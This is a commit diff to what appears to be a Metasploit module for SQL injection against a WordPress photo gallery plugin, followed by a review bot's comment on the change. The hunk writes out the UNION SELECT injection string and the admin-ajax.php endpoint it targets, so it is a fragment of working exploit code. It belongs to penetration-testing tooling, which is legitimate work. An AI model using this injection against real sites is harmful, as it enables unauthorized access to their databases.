1 parent 622072b commit 69f8679Copy full SHA for 69f8679
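--- a/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
+++ b/modules/auxiliary/gather/wp_photo_gallery_sqli.rb
@@ -54,7 +54,7 @@ def initialize(info = {})
 
 def get_sqli_object
 create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
- expr = payload.to_s.strip.gsub(/\s+/, ' ')
+ expr = payload.to_s.gsub(/\s+/, ' ').strip
 cols = Array.new(23) { |i| i == 7 ? "(#{expr})" : rand(1000..9999).to_s }
 injected = ")\" union select #{cols.join(',')} -- -g"
 endpoint = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')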
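Review bot: The reordered `expr` line appears to give the same string as before for ordinary whitespace, since leading and trailing runs are removed whether `strip` runs before or after the `gsub`, so the reason for the change is not evident from the hunk. A one-line comment above it would record the intent, for example `# collapse whitespace runs to single spaces, then trim both ends`. The literals `23` and `7` on the following `cols` line are also undocumented; a short comment or two named constants saying what they represent would make the block easier to audit. The `create_sqli` block continues past the end of this hunk, so anything it does with `endpoint` is not visible here.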